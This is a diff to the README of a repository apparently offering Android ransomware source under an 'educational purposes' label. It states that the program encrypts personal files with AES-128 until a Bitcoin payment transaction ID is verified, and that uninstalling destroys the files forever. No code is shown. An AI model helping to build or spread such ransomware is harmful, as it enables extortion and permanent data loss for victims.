ElijahCuff/AndroidNightmare/README.md

 #### This source code is released under the MIT License terms, entirely for educational purposes only.

-Encrypts personal files until bitcoin payment is verified.
+Encrypts personal files until a Bitcoin payment TxID is verified.
+Protocol,
+• AES 128 Bit Byte Encryption. (changeable)

 Uninstalling will destroy files forever.

 ### NOT SECURE